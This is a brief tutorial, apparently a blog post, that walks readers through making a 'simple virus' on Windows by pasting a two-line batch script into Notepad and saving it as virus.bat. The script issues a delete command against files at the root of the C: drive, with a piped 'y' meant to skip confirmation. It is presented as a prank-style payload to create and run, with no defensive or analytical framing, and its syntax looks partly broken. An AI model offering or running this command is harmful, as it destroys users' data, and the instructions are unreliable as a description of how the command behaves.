Want to make a simple virus on your computer….? In this article I will show you how making a simple virus by following steps:
Just open notepad ( Winkey+R ® run ® type notepad and hit enter) or any text editor.
Step-2:
Now copy and paste the following code below into the notepad.
@Echo off
Del C:\ *.* |y
Step-3:
Now save it as virus.bat ( where, virus is a file name and “. bat” is the file extension ).